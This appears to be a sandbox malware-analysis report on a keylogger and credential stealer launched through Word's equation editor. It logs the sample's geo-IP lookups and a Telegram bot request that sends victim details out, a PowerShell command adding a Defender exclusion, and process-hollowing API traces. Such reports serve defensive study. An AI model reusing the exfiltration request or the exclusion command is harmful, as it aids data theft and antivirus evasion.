                                              2024-09-26 05:47:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249174188.114.97.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:42 UTC676INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:42 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81721
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pS9z5Oec3zP868xp%2Bae17OsDL7yHgIKbSO01gBWDEoxSf7NYRT%2FsZxkkIfCUrSmekm1wF2IZtbrkWwr3lj2ggA46%2BPtrzXcngAVyJoYFeVYsWr3FZNdpyBLPsCAXUn03FcytoW0E"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5f45f144392-EWR
                                              2024-09-26 05:47:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249176188.114.96.34433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:43 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:43 UTC680INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 05:47:43 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 81722
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAw6wmyEgkaIFGGVCBVfUrn75pTqiHBHvhgvN3OTRzueD3qxuBPhCCJmRyr2X%2FyCx%2BxOtRn3%2Fq4mdi%2BjytradasH%2BQsKqAIqKu0h7SMOSmBvhTRFwTewBX2qGVSTHSkPGI3xksky"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c90f5fc3aa519aa-EWR
                                              2024-09-26 05:47:43 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 05:47:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.2249177149.154.167.2204433616C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 05:47:44 UTC352OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%209/26/2024%20/%204:38:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-09-26 05:47:44 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 05:47:44 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 05:47:44 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:01:47:14
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13f8a0000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:2
                                              Start time:01:47:15
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:01:47:21
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                                              Imagebase:0xe90000
                                              File size:704'000 bytes
                                              MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:01:47:23
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                                              Imagebase:0x310000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:01:47:23
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\vvndewepeter91026.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                                              Imagebase:0xe90000
                                              File size:704'000 bytes
                                              MD5 hash:42F2CE52A57E0D72EAC297A532354E42
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:9
                                              Start time:01:47:40
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:15.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:116
                                                Total number of Limit Nodes:3
                                                execution_graph 8416 26cbe9 8417 26cb5a 8416->8417 8418 26cb4a 8416->8418 8421 26da48 8418->8421 8425 26da39 8418->8425 8422 26da5d 8421->8422 8429 26da78 8422->8429 8426 26da5d 8425->8426 8428 26da78 12 API calls 8426->8428 8427 26da6f 8427->8417 8428->8427 8430 26daa2 8429->8430 8446 26e506 8430->8446 8451 26e038 8430->8451 8455 26df1f 8430->8455 8462 26e411 8430->8462 8467 26e370 8430->8467 8476 26deb7 8430->8476 8480 26df29 8430->8480 8485 26e588 8430->8485 8490 26e22a 8430->8490 8495 26e0aa 8430->8495 8500 26e1ce 8430->8500 8505 26e181 8430->8505 8514 26e120 8430->8514 8519 26df84 8430->8519 8431 26da6f 8431->8417 8447 26e50c 8446->8447 8527 26c2f1 8447->8527 8531 26c2f8 8447->8531 8448 26e52f 8535 26bf40 8451->8535 8539 26bf39 8451->8539 8452 26e052 8452->8431 8452->8452 8458 26bf40 Wow64SetThreadContext 8455->8458 8459 26bf39 Wow64SetThreadContext 8455->8459 8456 26df20 8457 26e052 8456->8457 8460 26bf40 Wow64SetThreadContext 8456->8460 8461 26bf39 Wow64SetThreadContext 8456->8461 8457->8431 8457->8457 8458->8456 8459->8456 8460->8457 8461->8457 8463 26e421 8462->8463 8543 26c190 8463->8543 8547 26c198 8463->8547 8464 26e5bf 8464->8431 8468 26df9b 8467->8468 8469 26e7a7 8468->8469 8551 26be50 8468->8551 8555 26be48 8468->8555 8470 26df0c 8471 26e052 8470->8471 8472 26bf40 Wow64SetThreadContext 8470->8472 8473 26bf39 Wow64SetThreadContext 8470->8473 8471->8431 8472->8471 8473->8471 8559 26c525 8476->8559 8563 26c530 8476->8563 8481 26df33 8480->8481 8483 26c190 WriteProcessMemory 8481->8483 8484 26c198 WriteProcessMemory 8481->8484 8482 26df65 8482->8431 8483->8482 8484->8482 8486 26e517 8485->8486 8487 26e52f 8485->8487 8488 26c2f1 ReadProcessMemory 8486->8488 8489 26c2f8 ReadProcessMemory 8486->8489 8488->8487 8489->8487 8491 26df15 8490->8491 8492 26e052 8491->8492 8493 26bf40 Wow64SetThreadContext 8491->8493 8494 26bf39 Wow64SetThreadContext 8491->8494 8492->8431 8492->8492 8493->8492 8494->8492 8496 26df15 8495->8496 8497 26e052 8496->8497 8498 26bf40 Wow64SetThreadContext 8496->8498 8499 26bf39 Wow64SetThreadContext 8496->8499 8497->8431 8497->8497 8498->8497 8499->8497 8501 26e037 8500->8501 8502 26e052 8501->8502 8503 26bf40 Wow64SetThreadContext 8501->8503 8504 26bf39 Wow64SetThreadContext 8501->8504 8502->8431 8502->8502 8503->8502 8504->8502 8506 26e315 8505->8506 8567 26c070 8506->8567 8571 26c068 8506->8571 8507 26df44 8508 26e74a 8507->8508 8512 26c190 WriteProcessMemory 8507->8512 8513 26c198 WriteProcessMemory 8507->8513 8508->8431 8509 26df65 8509->8431 8512->8509 8513->8509 8515 26e12c 8514->8515 8517 26c190 WriteProcessMemory 8515->8517 8518 26c198 WriteProcessMemory 8515->8518 8516 26e3cd 8517->8516 8518->8516 8520 26df8a 8519->8520 8525 26be50 ResumeThread 8520->8525 8526 26be48 ResumeThread 8520->8526 8521 26df0c 8522 26e052 8521->8522 8523 26bf40 Wow64SetThreadContext 8521->8523 8524 26bf39 Wow64SetThreadContext 8521->8524 8522->8431 8523->8522 8524->8522 8525->8521 8526->8521 8528 26c344 ReadProcessMemory 8527->8528 8530 26c3c2 8528->8530 8530->8448 8532 26c344 ReadProcessMemory 8531->8532 8534 26c3c2 8532->8534 8534->8448 8536 26bf89 Wow64SetThreadContext 8535->8536 8538 26c007 8536->8538 8538->8452 8540 26bf89 Wow64SetThreadContext 8539->8540 8542 26c007 8540->8542 8542->8452 8544 26c198 WriteProcessMemory 8543->8544 8546 26c283 8544->8546 8546->8464 8548 26c1e4 WriteProcessMemory 8547->8548 8550 26c283 8548->8550 8550->8464 8552 26be94 ResumeThread 8551->8552 8554 26bee6 8552->8554 8554->8470 8556 26be50 ResumeThread 8555->8556 8558 26bee6 8556->8558 8558->8470 8560 26c530 CreateProcessA 8559->8560 8562 26c815 8560->8562 8564 26c5b7 CreateProcessA 8563->8564 8566 26c815 8564->8566 8568 26c0b4 VirtualAllocEx 8567->8568 8570 26c132 8568->8570 8570->8507 8572 26c0b4 VirtualAllocEx 8571->8572 8574 26c132 8572->8574 8574->8507

                                                Executed Functions

                                                Function 0026604B Relevance: .2, Instructions: 151COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0a77ab3401225d0ae4a94dc9977cbbf88b8d12f4d5eca6615ff512a1d1773a9
                                                • Instruction ID: afee317b05d7e5a9baddac828919e501b50c0e8d397e34490751a8088e4124d5
                                                • Opcode Fuzzy Hash: e0a77ab3401225d0ae4a94dc9977cbbf88b8d12f4d5eca6615ff512a1d1773a9
                                                • Instruction Fuzzy Hash: 00512674A25229CFEB50EF68C688A9DF7FAFF4A304F148694C44DAB202C7709995CF41
                                                Function 0026C525 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 26c525-26c5c9 3 26c612-26c63a 0->3 4 26c5cb-26c5e2 0->4 8 26c680-26c6d6 3->8 9 26c63c-26c650 3->9 4->3 7 26c5e4-26c5e9 4->7 10 26c60c-26c60f 7->10 11 26c5eb-26c5f5 7->11 18 26c71c-26c813 CreateProcessA 8->18 19 26c6d8-26c6ec 8->19 9->8 16 26c652-26c657 9->16 10->3 13 26c5f7 11->13 14 26c5f9-26c608 11->14 13->14 14->14 17 26c60a 14->17 20 26c67a-26c67d 16->20 21 26c659-26c663 16->21 17->10 37 26c815-26c81b 18->37 38 26c81c-26c901 18->38 19->18 27 26c6ee-26c6f3 19->27 20->8 22 26c667-26c676 21->22 23 26c665 21->23 22->22 26 26c678 22->26 23->22 26->20 29 26c716-26c719 27->29 30 26c6f5-26c6ff 27->30 29->18 31 26c703-26c712 30->31 32 26c701 30->32 31->31 33 26c714 31->33 32->31 33->29 37->38 50 26c903-26c907 38->50 51 26c911-26c915 38->51 50->51 52 26c909 50->52 53 26c917-26c91b 51->53 54 26c925-26c929 51->54 52->51 53->54 55 26c91d 53->55 56 26c92b-26c92f 54->56 57 26c939-26c93d 54->57 55->54 56->57 60 26c931 56->60 58 26c973-26c97e 57->58 59 26c93f-26c968 57->59 64 26c97f 58->64 59->58 60->57 64->64
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0026C7F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: 44I$44I$44I
                                                • API String ID: 963392458-3005084644
                                                • Opcode ID: f21e9daaf660a285bfb92d79c97cce25e8480867387bba7793f9ec35a92e5342
                                                • Instruction ID: 38212f52d8f48db7ccbe794e46fff8150285b380a0d7e6f9d7e490f18f4468db
                                                • Opcode Fuzzy Hash: f21e9daaf660a285bfb92d79c97cce25e8480867387bba7793f9ec35a92e5342
                                                • Instruction Fuzzy Hash: 01C15570D1021ACFDF24DFA4C845BEEBBB1BB49300F1491A9E849B7240DB749A95CF95
                                                Function 0026C530 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 65 26c530-26c5c9 67 26c612-26c63a 65->67 68 26c5cb-26c5e2 65->68 72 26c680-26c6d6 67->72 73 26c63c-26c650 67->73 68->67 71 26c5e4-26c5e9 68->71 74 26c60c-26c60f 71->74 75 26c5eb-26c5f5 71->75 82 26c71c-26c813 CreateProcessA 72->82 83 26c6d8-26c6ec 72->83 73->72 80 26c652-26c657 73->80 74->67 77 26c5f7 75->77 78 26c5f9-26c608 75->78 77->78 78->78 81 26c60a 78->81 84 26c67a-26c67d 80->84 85 26c659-26c663 80->85 81->74 101 26c815-26c81b 82->101 102 26c81c-26c901 82->102 83->82 91 26c6ee-26c6f3 83->91 84->72 86 26c667-26c676 85->86 87 26c665 85->87 86->86 90 26c678 86->90 87->86 90->84 93 26c716-26c719 91->93 94 26c6f5-26c6ff 91->94 93->82 95 26c703-26c712 94->95 96 26c701 94->96 95->95 97 26c714 95->97 96->95 97->93 101->102 114 26c903-26c907 102->114 115 26c911-26c915 102->115 114->115 116 26c909 114->116 117 26c917-26c91b 115->117 118 26c925-26c929 115->118 116->115 117->118 119 26c91d 117->119 120 26c92b-26c92f 118->120 121 26c939-26c93d 118->121 119->118 120->121 124 26c931 120->124 122 26c973-26c97e 121->122 123 26c93f-26c968 121->123 128 26c97f 122->128 123->122 124->121 128->128
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0026C7F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: 44I$44I$44I
                                                • API String ID: 963392458-3005084644
                                                • Opcode ID: 363c5c8e261b93122c698745853a8399a76b4c29902eb9668333c0a7069db3fa
                                                • Instruction ID: 1914f35057d7b027c1f1f9f90bc28d2b01e9e9f737246b965704b50fc9e57aa8
                                                • Opcode Fuzzy Hash: 363c5c8e261b93122c698745853a8399a76b4c29902eb9668333c0a7069db3fa
                                                • Instruction Fuzzy Hash: 71C14470D1021ACFDF24DFA4C845BEEBBB1BB49300F1491AAE859B7240DB749A94CF95
                                                Function 0026C190 Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 189 26c190-26c203 192 26c205-26c217 189->192 193 26c21a-26c281 WriteProcessMemory 189->193 192->193 195 26c283-26c289 193->195 196 26c28a-26c2dc 193->196 195->196
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026C26B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: d9ad2df1066f26c868894cfdb1444edb6a8a499bd9f2a46ae404fca07169f855
                                                • Instruction ID: 72ddf03b5628e2c4f2a6c6673838ab337108377c99e1621053fffad8dfb16797
                                                • Opcode Fuzzy Hash: d9ad2df1066f26c868894cfdb1444edb6a8a499bd9f2a46ae404fca07169f855
                                                • Instruction Fuzzy Hash: 1541B9B4D01248DFCF00CFA9D984AEEBBB1BB49314F24942AE814BB210D375AA55CF64
                                                Function 0026C198 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 201 26c198-26c203 203 26c205-26c217 201->203 204 26c21a-26c281 WriteProcessMemory 201->204 203->204 206 26c283-26c289 204->206 207 26c28a-26c2dc 204->207 206->207
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026C26B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 38702f7e6f0a057afaedcf6738be3ebe122da9f8036e26a21a4055443bc9da72
                                                • Instruction ID: f677baabff8ae20d34ff96cb3d21880d4958050e47fabedd6c75f0308cd0e1a8
                                                • Opcode Fuzzy Hash: 38702f7e6f0a057afaedcf6738be3ebe122da9f8036e26a21a4055443bc9da72
                                                • Instruction Fuzzy Hash: 3941B9B4D01248DFCF00CFA9D984AEEBBB1BB49310F20942AE814B7210C334AA45CF64
                                                Function 0026C2F1 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 212 26c2f1-26c3c0 ReadProcessMemory 215 26c3c2-26c3c8 212->215 216 26c3c9-26c41b 212->216 215->216
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026C3AA
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.402461987.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_260000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: ca93a044d15ec2492abfae51078439d477633f75795309c2d05a8935d65392a5
                                                • Instruction ID: 21ae6b0110559c0a94b7d32058f2a8ade3e3761c0b1e39c82bc5956309d9e385
                                                • Opcode Fuzzy Hash: ca93a044d15ec2492abfae51078439d477633f75795309c2d05a8935d65392a5
                                                • Instruction Fuzzy Hash: 8041AAB9D00259DFCF00CFA9D884AEEFBB1BB49314F20942AE814B7250C775AA55CF64
                                                Function 0026C2F8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
